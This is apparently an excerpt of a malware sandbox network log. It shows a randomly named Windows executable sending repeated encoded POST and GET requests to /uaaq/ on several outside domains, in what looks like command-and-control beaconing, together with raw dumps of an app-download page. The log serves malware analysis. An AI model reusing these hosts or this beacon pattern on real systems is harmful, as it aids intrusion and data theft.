                                                                                    Dec 4, 2023 12:06:12.147283077 CET1340INData Raw: 75 67 68 2e 63 6f 6d 2f 61 6e 64 72 6f 69 64 2f 32 30 32 33 2d 31 32 2d 30 34 2f 65 76 6f 75 75 34 5f 36 38 37 38 38 2e 68 74 6d 6c 22 3e e5 ae 89 e5 8d 93 e6 89 8b e6 b8 b8 3c 2f 61 3e e2 86 92 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                    Data Ascii: ugh.com/android/2023-12-04/evouu4_68788.html"></a> <a href="http://www.viough.com/android/2023-12-04/pia2g_26923.html"></a> <a>pg v19.19.8</a> </div>
                                                                                    Dec 4, 2023 12:06:12.147375107 CET1340INData Raw: 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6f 70 65 6e 50 61 63 6b 61 67 65 28 35 35 35 2c 27 70 67 e7 94 b5 e5 ad 90 e8 b5 8f e9 87 91 e8 88 b9 e9 95 bf e4 b9 9d e4 b8 aa e8 88 b9 e9 95 bf 27 2c 27 63 6f 6d 2e 6a 76 2e 63 61 6c 65 2e
                                                                                    Data Ascii: href="javascript:openPackage(555,'pg','com.jv.cale.gcp');" data="1" rel="nofollow"><span class="icon az"></span><span></span></a></li> <li class="bnt_ios" style="display: none
                                                                                    Dec 4, 2023 12:06:12.496366978 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 61 70 70 69 63 6f 6e 2f 34 35 34 2f 32 32 36 38 30 37 39 2e 6a 70 67 22 20 61 6c 74 3d 22 e5 86 b2 e4 ba 86 e8 bf 99 e7 a0 b4 e5 a1 94 22 3e 3c 73
                                                                                    Data Ascii: <img src="/appicon/454/2268079.jpg" alt=""><span class="cover_68"></span> <em> v8.17</em> </a>
                                                                                    Dec 4, 2023 12:06:12.496444941 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20
                                                                                    Data Ascii: </ul> </div> </div> <div class="show_15"> <div class="yx_title"> <ul id="test_yx_list"><li class="last"></li><li>
                                                                                    Dec 4, 2023 12:06:12.845388889 CET1340INData Raw: 3e 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 70 74 6a 5f 6c 69 73 74 20 63 6c 65 61 72 66 69 78 22 20 69 64 3d 22 61 6e 7a 68 75 6f 5f 41 22 3e 0d 0a 20 20 20
                                                                                    Data Ascii: ></div> <div class="jptj_list clearfix" id="anzhuo_A"> <ul> <li > <a href="http://87.viough.com
                                                                                    Dec 4, 2023 12:06:12.845467091 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 61 70 70 69 63 6f 6e 2f 34 33 39 2f 32 31 39 31 33 34 35 2e 6a 70 67 22 20 61 6c 74 3d 22 e7 8b 82 e9 a3 99 e6
                                                                                    Data Ascii: <img src="/appicon/439/2191345.jpg" alt=""><span class="cover_68"></span> <em> v4.8</em> </a>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    41 | 192.168.11.30 | 49795 | 54.73.26.109 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:07:28.956940889 CET | 704 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.luciengeorge.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.luciengeorge.com
                                                                                    Referer: http://www.luciengeorge.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=SkvdxEzicz953yR7uihFqcHzXzlzRKUDkMW+DaDh/Gk3umbfi7H6UngUby2HcqZMzlqu/3sZgmJW6KswOvGGStgVG8F8pGya5BxsZKoumS67EKTYCOoxyldl5f4mbrGod+LNLp7SAZ/hkSzbUOlPL9Ham73jPoWvQz9bPwKCeWe+XJlm+w==
                                                                                    Dec 4, 2023 12:07:29.144299984 CET | 1005 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Server: Cowboy
                                                                                    Date: Mon, 04 Dec 2023 11:07:28 GMT
                                                                                    Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1701688049&sid=812dcc77-0bd0-43b1-a5f1-b25750382959&s=57tq261GbKVfQdutv4DNYS7MbPZutrLZvrGKDS9eUSM%3D"}]}
                                                                                    Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1701688049&sid=812dcc77-0bd0-43b1-a5f1-b25750382959&s=57tq261GbKVfQdutv4DNYS7MbPZutrLZvrGKDS9eUSM%3D
                                                                                    Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Content-Type: text/html
                                                                                    Location: http://www.lucien.dev/uaaq/
                                                                                    Content-Length: 214
                                                                                    Via: 1.1 vegur
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.lucien.dev/uaaq/">here</a>.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    42 | 192.168.11.30 | 49796 | 54.73.26.109 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:07:31.671689034 CET | 724 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.luciengeorge.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.luciengeorge.com
                                                                                    Referer: http://www.luciengeorge.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=SkvdxEzicz952RJ7ihJF7sHwUzlzaqUYkMa+Db3x/0A3uHrfj6H6TngUPC3NRKZxzlnO/yMZgmdW6I0wOcvQAtgtNcF+nmya5BxsZK8EmWW7D+XYCvoy/FdktP4mK7Gsd+KYLpK5Ac7hkQrbTfkZC9HYi72PfKbleSECKDyZAmbPb8J15I7dTQn/EPQmc9mygxpmBzc=
                                                                                    Dec 4, 2023 12:07:31.858505964 CET | 1013 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Server: Cowboy
                                                                                    Date: Mon, 04 Dec 2023 11:07:31 GMT
                                                                                    Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1701688051&sid=812dcc77-0bd0-43b1-a5f1-b25750382959&s=HAErWp3obUTQBZA%2Fj9BoB%2Bsgw67ZD1EMsia7DE9SjQg%3D"}]}
                                                                                    Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1701688051&sid=812dcc77-0bd0-43b1-a5f1-b25750382959&s=HAErWp3obUTQBZA%2Fj9BoB%2Bsgw67ZD1EMsia7DE9SjQg%3D
                                                                                    Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Content-Type: text/html
                                                                                    Location: http://www.lucien.dev/uaaq/
                                                                                    Content-Length: 214
                                                                                    Via: 1.1 vegur
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.lucien.dev/uaaq/">here</a>.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    43 | 192.168.11.30 | 49797 | 54.73.26.109 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:07:34.374680042 CET | 1641 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.luciengeorge.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.luciengeorge.com
                                                                                    Referer: http://www.luciengeorge.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:07:34.561839104 CET | 1013 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Server: Cowboy
                                                                                    Date: Mon, 04 Dec 2023 11:07:33 GMT
                                                                                    Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1701688054&sid=812dcc77-0bd0-43b1-a5f1-b25750382959&s=87NehU4sJxCU3CwD1LJ%2FLI0QkNjZM4w4R8K9dzO%2B1bk%3D"}]}
                                                                                    Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1701688054&sid=812dcc77-0bd0-43b1-a5f1-b25750382959&s=87NehU4sJxCU3CwD1LJ%2FLI0QkNjZM4w4R8K9dzO%2B1bk%3D
                                                                                    Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Content-Type: text/html
                                                                                    Location: http://www.lucien.dev/uaaq/
                                                                                    Content-Length: 214
                                                                                    Via: 1.1 vegur
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.lucien.dev/uaaq/">here</a>.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    44 | 192.168.11.30 | 49798 | 54.73.26.109 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:07:37.077152014 CET | 428 | OUT | GET /uaaq/?9pG0L=fmH9yz//bCxvzW52vWt98M+uaVtRGNwHjsHeAa3s9TBNvVrXrI6jb3VoW2ynR6RQyk2x+GY+m0JVnac7FabBN9cfOPAzgTn6pg==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.luciengeorge.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:07:37.263576031 CET | 1267 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Server: Cowboy
                                                                                    Date: Mon, 04 Dec 2023 11:07:36 GMT
                                                                                    Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1701688057&sid=812dcc77-0bd0-43b1-a5f1-b25750382959&s=84prChwYVrdPSN%2Bj2%2FiO22IpUHjxeGL%2Fguvnh%2BiLsaU%3D"}]}
                                                                                    Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1701688057&sid=812dcc77-0bd0-43b1-a5f1-b25750382959&s=84prChwYVrdPSN%2Bj2%2FiO22IpUHjxeGL%2Fguvnh%2BiLsaU%3D
                                                                                    Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Content-Type: text/html
                                                                                    Location: http://www.lucien.dev/uaaq/?9pG0L=fmH9yz//bCxvzW52vWt98M+uaVtRGNwHjsHeAa3s9TBNvVrXrI6jb3VoW2ynR6RQyk2x+GY+m0JVnac7FabBN9cfOPAzgTn6pg==&XFs82=6R5Xx6907
                                                                                    Content-Length: 337
                                                                                    Via: 1.1 vegur
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.lucien.dev/uaaq/?9pG0L=fmH9yz//bCxvzW52vWt98M+uaVtRGNwHjsHeAa3s9TBNvVrXrI6jb3VoW2ynR6RQyk2x+GY+m0JVnac7FabBN9cfOPAzgTn6pg==&XFs82=6R5Xx6907">here</a>.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    45 | 192.168.11.30 | 49799 | 31.186.11.254 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:07:51.421771049 CET | 683 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.tunug.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.tunug.xyz
                                                                                    Referer: http://www.tunug.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=R8SzfXoH2bXhYI0wbCXVgDFX0/zghTNQvHaWgODLX5WIPebibu9z6oLtYV+X1Rb/NSCDvB36TN/E1tvRbOLTg8xI1JP4nIOCMvXGMNfy5lvyOTQwPOuvElCP/n9firycuzQQuAVCMQ7VK1sObXFoCqx2PKt8tGEo0NEBY82sRepL1nD3Ew==
                                                                                    Dec 4, 2023 12:07:51.637972116 CET | 516 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:08:09 GMT
                                                                                    Server: Apache/2.2.15 (CentOS)
                                                                                    Content-Length: 282
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uaaq/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.tunug.xyz Port 80</address></body></html>


                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                    46  192.168.11.30  49800  31.186.11.254  80  3712  C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                    Dec 4, 2023 12:07:54.166981936 CET  703  OUT  POST /uaaq/ HTTP/1.1
                                                                                    Host: www.tunug.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.tunug.xyz
                                                                                    Referer: http://www.tunug.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=R8SzfXoH2bXhaoEwLTXVmjFQ6fzg4DNUvHmWgLiOCayIO/riav9z5oLtQ1+Sohb0NSe6vAL6TJXE1tfRb9jQgsxKsZPm6YOCMvXGMNLI5l3yPgIwOrD5NFCOoX9fo7yAuzQ5uCh4MTDVK30OcGE+Lqx0LKsYj3Es0NwMJfm/Pu5F9SvkDDhMJgPXhbVpuWfhfeZ6aqE=
                                                                                    Dec 4, 2023 12:07:54.383419991 CET  516  IN  HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:08:12 GMT
                                                                                    Server: Apache/2.2.15 (CentOS)
                                                                                    Content-Length: 282
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uaaq/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.tunug.xyz Port 80</address></body></html>


                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                    47  192.168.11.30  49801  31.186.11.254  80  3712  C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                    Dec 4, 2023 12:07:56.905744076 CET  1620  OUT  POST /uaaq/ HTTP/1.1
                                                                                    Host: www.tunug.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.tunug.xyz
                                                                                    Referer: http://www.tunug.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:07:57.127574921 CET  516  IN  HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:08:15 GMT
                                                                                    Server: Apache/2.2.15 (CentOS)
                                                                                    Content-Length: 282
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uaaq/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.tunug.xyz Port 80</address></body></html>


                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                    48  192.168.11.30  49802  31.186.11.254  80  3712  C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                    Dec 4, 2023 12:07:59.651575089 CET  421  OUT  GET /uaaq/?9pG0L=c+6TcgwS74LYb/BtPGzNqx0v24f4gkgpuEv8j4KmZe3KWMq5Vv4U79mpWhSZrgbcOhaTjzTbW4/9rezZQ6Dag7ZY/b6dvvuFMQ==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.tunug.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:07:59.869884014 CET  516  IN  HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:08:18 GMT
                                                                                    Server: Apache/2.2.15 (CentOS)
                                                                                    Content-Length: 282
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uaaq/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.tunug.xyz Port 80</address></body></html>


                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                    49  192.168.11.30  49803  66.96.162.139  80  3712  C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                    Dec 4, 2023 12:08:05.146527052 CET  725  OUT  POST /uaaq/ HTTP/1.1
                                                                                    Host: www.dabblefurnishings.space
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.dabblefurnishings.space
                                                                                    Referer: http://www.dabblefurnishings.space/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=UMjOznsDbRXN5hxVb2ldKv28L8Pb06HJm84gxTbHXOifJE5Zkx5Q1Q0+Jddp8CYx8q1xzF4LkOMkRtVDyqPhjP/uHWtgjAie7BJOZrJTKi8vwXHNp5SQwqRAe/gG9i3J4RfZwOouyAD9IyMAAnrH9xqwjxQgwUHHFYYFgfGMVC3ewk+u4Q==
                                                                                    Dec 4, 2023 12:08:05.270065069 CET  1143  IN  HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:08:05 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 867
                                                                                    Connection: close
                                                                                    Server: Apache/2
                                                                                    Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 0
                                                                                    Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                    50  192.168.11.30  49804  66.96.162.139  80  3712  C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                    Dec 4, 2023 12:08:07.769362926 CET  745  OUT  POST /uaaq/ HTTP/1.1
                                                                                    Host: www.dabblefurnishings.space
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.dabblefurnishings.space
                                                                                    Referer: http://www.dabblefurnishings.space/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=UMjOznsDbRXNrSpVXxxdBv2/I8Pb+aGhm80gxR3xX8WfImhZl1tQyQ0+C9dgjSY+8qwMzAQLkOYkRslDydjgg//sP2ti8wie7BJOZrdpKi0vwn3N7NGXsaRBZ/gGqy3F4RfvwLMEyGf9IycAAyHEzxr79BRywXyVfvlYx+GCGQOVxxS9/sawue918uczTLhwgdmhcRo=
                                                                                    Dec 4, 2023 12:08:07.883236885 CET  1143  IN  HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:08:07 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 867
                                                                                    Connection: close
                                                                                    Server: Apache/2
                                                                                    Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 0
                                                                                    Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    51 | 192.168.11.30 | 49805 | 66.96.162.139 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:08:10.394123077 CET | 1662 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.dabblefurnishings.space
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.dabblefurnishings.space
                                                                                    Referer: http://www.dabblefurnishings.space/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=
                                                                                    Dec 4, 2023 12:08:10.512509108 CET | 1143 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:08:10 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 867
                                                                                    Connection: close
                                                                                    Server: Apache/2
                                                                                    Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 0
                                                                                    Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    52 | 192.168.11.30 | 49806 | 66.96.162.139 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:08:13.015963078 CET | 435 | OUT | GET /uaaq/?XFs82=6R5Xx6907&9pG0L=ZOLuwQ4GbhudklNTaAF4CqvaFcPUnb+ksfYc3Sr7bbbYZkY3qV8I6hFKN8xphgAEys4W8UAai/ACKckVxru298r+LRMvoVTRoA== HTTP/1.1
